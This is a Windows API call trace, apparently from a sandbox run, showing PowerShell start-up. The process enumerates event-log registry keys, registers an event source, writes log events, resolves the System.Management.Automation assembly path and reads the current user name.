[0080.670] RegEnumKeyExW (in: hKey=0x358, dwIndex=0x2, lpName=0x1c3c90, lpcchName=0x10cee8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x10cee8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0080.670] CoTaskMemFree (pv=0x1c3c90)
[0080.670] CoTaskMemFree (pv=0x0)
[0080.670] CoTaskMemAlloc (cb=0x204) returned 0x1c3c90
[0080.670] RegEnumKeyExW (in: hKey=0x358, dwIndex=0x3, lpName=0x1c3c90, lpcchName=0x10cee8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x10cee8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0080.670] CoTaskMemFree (pv=0x1c3c90)
[0080.670] CoTaskMemFree (pv=0x0)
[0080.670] CoTaskMemAlloc (cb=0x204) returned 0x1c3c90
[0080.670] RegEnumKeyExW (in: hKey=0x358, dwIndex=0x4, lpName=0x1c3c90, lpcchName=0x10cee8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x10cee8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0080.670] CoTaskMemFree (pv=0x1c3c90)
[0080.670] CoTaskMemFree (pv=0x0)
[0080.670] CoTaskMemAlloc (cb=0x204) returned 0x1c3c90
[0080.671] RegEnumKeyExW (in: hKey=0x358, dwIndex=0x5, lpName=0x1c3c90, lpcchName=0x10cee8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x10cee8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0080.671] CoTaskMemFree (pv=0x1c3c90)
[0080.671] CoTaskMemFree (pv=0x0)
[0080.671] CoTaskMemAlloc (cb=0x204) returned 0x1c3c90
[0080.671] RegEnumKeyExW (in: hKey=0x358, dwIndex=0x6, lpName=0x1c3c90, lpcchName=0x10cee8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x10cee8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0080.671] CoTaskMemFree (pv=0x1c3c90)
[0080.671] CoTaskMemFree (pv=0x0)
[0080.671] CoTaskMemAlloc (cb=0x204) returned 0x1c3c90
[0080.671] RegEnumKeyExW (in: hKey=0x358, dwIndex=0x7, lpName=0x1c3c90, lpcchName=0x10cee8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x10cee8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0080.671] CoTaskMemFree (pv=0x1c3c90)
[0080.671] CoTaskMemFree (pv=0x0)
[0080.671] CoTaskMemAlloc (cb=0x204) returned 0x1c3c90
[0080.671] RegEnumKeyExW (in: hKey=0x358, dwIndex=0x8, lpName=0x1c3c90, lpcchName=0x10cee8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x10cee8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0080.671] CoTaskMemFree (pv=0x1c3c90)
[0080.671] CoTaskMemFree (pv=0x0)
[0080.671] RegOpenKeyExW (in: hKey=0x358, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x10cf48 | out: phkResult=0x10cf48*=0x35c) returned 0x0
[0080.671] RegOpenKeyExW (in: hKey=0x35c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x10cf48 | out: phkResult=0x10cf48*=0x0) returned 0x2
[0080.671] RegOpenKeyExW (in: hKey=0x358, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x10cf48 | out: phkResult=0x10cf48*=0x360) returned 0x0
[0080.671] RegOpenKeyExW (in: hKey=0x360, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x10cf48 | out: phkResult=0x10cf48*=0x0) returned 0x2
[0080.671] RegOpenKeyExW (in: hKey=0x358, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x10cf48 | out: phkResult=0x10cf48*=0x364) returned 0x0
[0080.671] RegOpenKeyExW (in: hKey=0x364, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x10cf48 | out: phkResult=0x10cf48*=0x0) returned 0x2
[0080.671] RegOpenKeyExW (in: hKey=0x358, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x10cf48 | out: phkResult=0x10cf48*=0x368) returned 0x0
[0080.671] RegOpenKeyExW (in: hKey=0x368, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x10cf48 | out: phkResult=0x10cf48*=0x0) returned 0x2
[0080.671] RegOpenKeyExW (in: hKey=0x358, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x10cf48 | out: phkResult=0x10cf48*=0x36c) returned 0x0
[0080.671] RegOpenKeyExW (in: hKey=0x36c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x10cf48 | out: phkResult=0x10cf48*=0x0) returned 0x2
[0080.672] RegOpenKeyExW (in: hKey=0x358, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x10cf48 | out: phkResult=0x10cf48*=0x370) returned 0x0
[0080.672] RegOpenKeyExW (in: hKey=0x370, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x10cf48 | out: phkResult=0x10cf48*=0x0) returned 0x2
[0080.672] RegOpenKeyExW (in: hKey=0x358, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x10cf48 | out: phkResult=0x10cf48*=0x0) returned 0x5
[0080.675] RegOpenKeyExW (in: hKey=0x358, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x10cf48 | out: phkResult=0x10cf48*=0x374) returned 0x0
[0080.675] RegOpenKeyExW (in: hKey=0x374, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x10cf48 | out: phkResult=0x10cf48*=0x0) returned 0x2
[0080.675] RegOpenKeyExW (in: hKey=0x358, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x10cf48 | out: phkResult=0x10cf48*=0x378) returned 0x0
[0080.675] RegOpenKeyExW (in: hKey=0x378, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x10cf48 | out: phkResult=0x10cf48*=0x37c) returned 0x0
[0080.676] RegCloseKey (hKey=0x37c) returned 0x0
[0080.676] RegCloseKey (hKey=0x358) returned 0x0
[0080.676] RegCloseKey (hKey=0x378) returned 0x0
[0080.676] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x10cee8 | out: phkResult=0x10cee8*=0x378) returned 0x0
[0080.676] RegQueryInfoKeyW (in: hKey=0x378, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x10ce5c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x10ce58, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x10ce5c*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x10ce58*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0080.676] CoTaskMemFree (pv=0x0)
[0080.676] CoTaskMemAlloc (cb=0x204) returned 0x1c3c90
[0080.676] RegEnumKeyExW (in: hKey=0x378, dwIndex=0x0, lpName=0x1c3c90, lpcchName=0x10cee8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x10cee8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0080.676] CoTaskMemFree (pv=0x1c3c90)
[0080.676] CoTaskMemFree (pv=0x0)
[0080.676] CoTaskMemAlloc (cb=0x204) returned 0x1c3c90
[0080.676] RegEnumKeyExW (in: hKey=0x378, dwIndex=0x1, lpName=0x1c3c90, lpcchName=0x10cee8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x10cee8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0080.676] CoTaskMemFree (pv=0x1c3c90)
[0080.676] CoTaskMemFree (pv=0x0)
[0080.676] CoTaskMemAlloc (cb=0x204) returned 0x1c3c90
[0080.676] RegEnumKeyExW (in: hKey=0x378, dwIndex=0x2, lpName=0x1c3c90, lpcchName=0x10cee8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x10cee8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0080.676] CoTaskMemFree (pv=0x1c3c90)
[0080.676] CoTaskMemFree (pv=0x0)
[0080.676] CoTaskMemAlloc (cb=0x204) returned 0x1c3c90
[0080.676] RegEnumKeyExW (in: hKey=0x378, dwIndex=0x3, lpName=0x1c3c90, lpcchName=0x10cee8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x10cee8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0080.676] CoTaskMemFree (pv=0x1c3c90)
[0080.676] CoTaskMemFree (pv=0x0)
[0080.676] CoTaskMemAlloc (cb=0x204) returned 0x1c3c90
[0080.676] RegEnumKeyExW (in: hKey=0x378, dwIndex=0x4, lpName=0x1c3c90, lpcchName=0x10cee8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x10cee8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0080.676] CoTaskMemFree (pv=0x1c3c90)
[0080.677] CoTaskMemFree (pv=0x0)
[0080.677] CoTaskMemAlloc (cb=0x204) returned 0x1c3c90
[0080.677] RegEnumKeyExW (in: hKey=0x378, dwIndex=0x5, lpName=0x1c3c90, lpcchName=0x10cee8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x10cee8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0080.677] CoTaskMemFree (pv=0x1c3c90)
[0080.677] CoTaskMemFree (pv=0x0)
[0080.677] CoTaskMemAlloc (cb=0x204) returned 0x1c3c90
[0080.677] RegEnumKeyExW (in: hKey=0x378, dwIndex=0x6, lpName=0x1c3c90, lpcchName=0x10cee8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x10cee8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0080.677] CoTaskMemFree (pv=0x1c3c90)
[0080.677] CoTaskMemFree (pv=0x0)
[0080.677] CoTaskMemAlloc (cb=0x204) returned 0x1c3c90
[0080.677] RegEnumKeyExW (in: hKey=0x378, dwIndex=0x7, lpName=0x1c3c90, lpcchName=0x10cee8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x10cee8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0080.677] CoTaskMemFree (pv=0x1c3c90)
[0080.677] CoTaskMemFree (pv=0x0)
[0080.677] CoTaskMemAlloc (cb=0x204) returned 0x1c3c90
[0080.677] RegEnumKeyExW (in: hKey=0x378, dwIndex=0x8, lpName=0x1c3c90, lpcchName=0x10cee8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x10cee8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0080.677] CoTaskMemFree (pv=0x1c3c90)
[0080.677] CoTaskMemFree (pv=0x0)
[0080.677] RegOpenKeyExW (in: hKey=0x378, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x10cf48 | out: phkResult=0x10cf48*=0x358) returned 0x0
[0080.677] RegOpenKeyExW (in: hKey=0x358, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x10cf48 | out: phkResult=0x10cf48*=0x0) returned 0x2
[0080.677] RegOpenKeyExW (in: hKey=0x378, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x10cf48 | out: phkResult=0x10cf48*=0x37c) returned 0x0
[0080.677] RegOpenKeyExW (in: hKey=0x37c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x10cf48 | out: phkResult=0x10cf48*=0x0) returned 0x2
[0080.677] RegOpenKeyExW (in: hKey=0x378, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x10cf48 | out: phkResult=0x10cf48*=0x380) returned 0x0
[0080.677] RegOpenKeyExW (in: hKey=0x380, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x10cf48 | out: phkResult=0x10cf48*=0x0) returned 0x2
[0080.677] RegOpenKeyExW (in: hKey=0x378, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x10cf48 | out: phkResult=0x10cf48*=0x384) returned 0x0
[0080.677] RegOpenKeyExW (in: hKey=0x384, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x10cf48 | out: phkResult=0x10cf48*=0x0) returned 0x2
[0080.677] RegOpenKeyExW (in: hKey=0x378, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x10cf48 | out: phkResult=0x10cf48*=0x388) returned 0x0
[0080.677] RegOpenKeyExW (in: hKey=0x388, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x10cf48 | out: phkResult=0x10cf48*=0x0) returned 0x2
[0080.678] RegOpenKeyExW (in: hKey=0x378, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x10cf48 | out: phkResult=0x10cf48*=0x38c) returned 0x0
[0080.678] RegOpenKeyExW (in: hKey=0x38c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x10cf48 | out: phkResult=0x10cf48*=0x0) returned 0x2
[0080.678] RegOpenKeyExW (in: hKey=0x378, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x10cf48 | out: phkResult=0x10cf48*=0x0) returned 0x5
[0080.681] RegOpenKeyExW (in: hKey=0x378, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x10cf48 | out: phkResult=0x10cf48*=0x390) returned 0x0
[0080.681] RegOpenKeyExW (in: hKey=0x390, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x10cf48 | out: phkResult=0x10cf48*=0x0) returned 0x2
[0080.681] RegOpenKeyExW (in: hKey=0x378, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x10cf48 | out: phkResult=0x10cf48*=0x394) returned 0x0
[0080.681] RegOpenKeyExW (in: hKey=0x394, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x10cf48 | out: phkResult=0x10cf48*=0x398) returned 0x0
[0080.681] RegCloseKey (hKey=0x398) returned 0x0
[0080.681] RegCloseKey (hKey=0x378) returned 0x0
[0080.681] RegCloseKey (hKey=0x394) returned 0x0
[0080.682] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x10ceb8 | out: phkResult=0x10ceb8*=0x394) returned 0x0
[0080.682] RegQueryInfoKeyW (in: hKey=0x394, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x10ce2c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x10ce28, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x10ce2c*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x10ce28*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0080.682] CoTaskMemFree (pv=0x0)
[0080.682] CoTaskMemAlloc (cb=0x204) returned 0x1c3c90
[0080.682] RegEnumKeyExW (in: hKey=0x394, dwIndex=0x0, lpName=0x1c3c90, lpcchName=0x10ceb8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x10ceb8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0080.682] CoTaskMemFree (pv=0x1c3c90)
[0080.682] CoTaskMemFree (pv=0x0)
[0080.682] CoTaskMemAlloc (cb=0x204) returned 0x1c3c90
[0080.682] RegEnumKeyExW (in: hKey=0x394, dwIndex=0x1, lpName=0x1c3c90, lpcchName=0x10ceb8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x10ceb8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0080.682] CoTaskMemFree (pv=0x1c3c90)
[0080.682] CoTaskMemFree (pv=0x0)
[0080.682] CoTaskMemAlloc (cb=0x204) returned 0x1c3c90
[0080.682] RegEnumKeyExW (in: hKey=0x394, dwIndex=0x2, lpName=0x1c3c90, lpcchName=0x10ceb8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x10ceb8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0080.682] CoTaskMemFree (pv=0x1c3c90)
[0080.682] CoTaskMemFree (pv=0x0)
[0080.682] CoTaskMemAlloc (cb=0x204) returned 0x1c3c90
[0080.682] RegEnumKeyExW (in: hKey=0x394, dwIndex=0x3, lpName=0x1c3c90, lpcchName=0x10ceb8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x10ceb8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0080.682] CoTaskMemFree (pv=0x1c3c90)
[0080.682] CoTaskMemFree (pv=0x0)
[0080.682] CoTaskMemAlloc (cb=0x204) returned 0x1c3c90
[0080.682] RegEnumKeyExW (in: hKey=0x394, dwIndex=0x4, lpName=0x1c3c90, lpcchName=0x10ceb8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x10ceb8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0080.682] CoTaskMemFree (pv=0x1c3c90)
[0080.682] CoTaskMemFree (pv=0x0)
[0080.682] CoTaskMemAlloc (cb=0x204) returned 0x1c3c90
[0080.682] RegEnumKeyExW (in: hKey=0x394, dwIndex=0x5, lpName=0x1c3c90, lpcchName=0x10ceb8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x10ceb8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0080.683] CoTaskMemFree (pv=0x1c3c90)
[0080.683] CoTaskMemFree (pv=0x0)
[0080.683] CoTaskMemAlloc (cb=0x204) returned 0x1c3c90
[0080.683] RegEnumKeyExW (in: hKey=0x394, dwIndex=0x6, lpName=0x1c3c90, lpcchName=0x10ceb8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x10ceb8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0080.683] CoTaskMemFree (pv=0x1c3c90)
[0080.683] CoTaskMemFree (pv=0x0)
[0080.683] CoTaskMemAlloc (cb=0x204) returned 0x1c3c90
[0080.683] RegEnumKeyExW (in: hKey=0x394, dwIndex=0x7, lpName=0x1c3c90, lpcchName=0x10ceb8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x10ceb8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0080.683] CoTaskMemFree (pv=0x1c3c90)
[0080.683] CoTaskMemFree (pv=0x0)
[0080.683] CoTaskMemAlloc (cb=0x204) returned 0x1c3c90
[0080.683] RegEnumKeyExW (in: hKey=0x394, dwIndex=0x8, lpName=0x1c3c90, lpcchName=0x10ceb8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x10ceb8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0080.683] CoTaskMemFree (pv=0x1c3c90)
[0080.683] CoTaskMemFree (pv=0x0)
[0080.683] RegOpenKeyExW (in: hKey=0x394, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x10cf18 | out: phkResult=0x10cf18*=0x378) returned 0x0
[0080.683] RegOpenKeyExW (in: hKey=0x378, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x10cf18 | out: phkResult=0x10cf18*=0x0) returned 0x2
[0080.683] RegOpenKeyExW (in: hKey=0x394, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x10cf18 | out: phkResult=0x10cf18*=0x398) returned 0x0
[0080.683] RegOpenKeyExW (in: hKey=0x398, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x10cf18 | out: phkResult=0x10cf18*=0x0) returned 0x2
[0080.683] RegOpenKeyExW (in: hKey=0x394, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x10cf18 | out: phkResult=0x10cf18*=0x39c) returned 0x0
[0080.683] RegOpenKeyExW (in: hKey=0x39c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x10cf18 | out: phkResult=0x10cf18*=0x0) returned 0x2
[0080.683] RegOpenKeyExW (in: hKey=0x394, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x10cf18 | out: phkResult=0x10cf18*=0x3a0) returned 0x0
[0080.683] RegOpenKeyExW (in: hKey=0x3a0, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x10cf18 | out: phkResult=0x10cf18*=0x0) returned 0x2
[0080.683] RegOpenKeyExW (in: hKey=0x394, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x10cf18 | out: phkResult=0x10cf18*=0x3a4) returned 0x0
[0080.683] RegOpenKeyExW (in: hKey=0x3a4, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x10cf18 | out: phkResult=0x10cf18*=0x0) returned 0x2
[0080.683] RegOpenKeyExW (in: hKey=0x394, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x10cf18 | out: phkResult=0x10cf18*=0x3a8) returned 0x0
[0080.683] RegOpenKeyExW (in: hKey=0x3a8, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x10cf18 | out: phkResult=0x10cf18*=0x0) returned 0x2
[0080.684] RegOpenKeyExW (in: hKey=0x394, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x10cf18 | out: phkResult=0x10cf18*=0x0) returned 0x5
[0080.687] RegOpenKeyExW (in: hKey=0x394, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x10cf18 | out: phkResult=0x10cf18*=0x3ac) returned 0x0
[0080.687] RegOpenKeyExW (in: hKey=0x3ac, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x10cf18 | out: phkResult=0x10cf18*=0x0) returned 0x2
[0080.687] RegOpenKeyExW (in: hKey=0x394, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x10cf18 | out: phkResult=0x10cf18*=0x3b0) returned 0x0
[0080.687] RegOpenKeyExW (in: hKey=0x3b0, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x10cf18 | out: phkResult=0x10cf18*=0x3b4) returned 0x0
[0080.687] RegCloseKey (hKey=0x3b4) returned 0x0
[0080.687] RegCloseKey (hKey=0x394) returned 0x0
[0080.687] RegCloseKey (hKey=0x3b0) returned 0x0
[0080.774] RegisterEventSourceW (lpUNCServerName=".", lpSourceName="PowerShell") returned 0x1b880008
[0080.777] ReportEventW (hEventLog=0x1b880008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x3c2d278*="WSMan", lpRawData=0x3c2cfe8) returned 1
[0080.789] CoTaskMemAlloc (cb=0x104) returned 0x229ec0
[0080.789] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x229ec0, nSize=0x80 | out: lpBuffer="") returned 0x0
[0080.789] CoTaskMemFree (pv=0x229ec0)
[0080.790] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10ca50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0080.790] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c9a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0080.790] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c9a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0080.791] CoTaskMemAlloc (cb=0x804) returned 0x1b7928d0
[0080.791] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b7928d0, nSize=0x10d1a8 | out: lpNameBuffer="YKYD69Q\\aETAdzjz", nSize=0x10d1a8) returned 0x1
[0080.791] CoTaskMemFree (pv=0x1b7928d0)
[0080.791] CoTaskMemAlloc (cb=0x204) returned 0x1c3c90
[0080.791] GetUserNameW (in: lpBuffer=0x1c3c90, pcbBuffer=0x10d1e8 | out: lpBuffer="aETAdzjz", pcbBuffer=0x10d1e8) returned 1
[0080.791] CoTaskMemFree (pv=0x1c3c90)
[0080.791] ReportEventW (hEventLog=0x1b880008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x3c32760*="Alias", lpRawData=0x3c324f0) returned 1
[0080.797] CoTaskMemAlloc (cb=0x104) returned 0x229ec0
[0080.797] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x229ec0, nSize=0x80 | out: lpBuffer="") returned 0x0
[0080.797] CoTaskMemFree (pv=0x229ec0)
[0080.798] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10ca50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0080.798] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c9a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
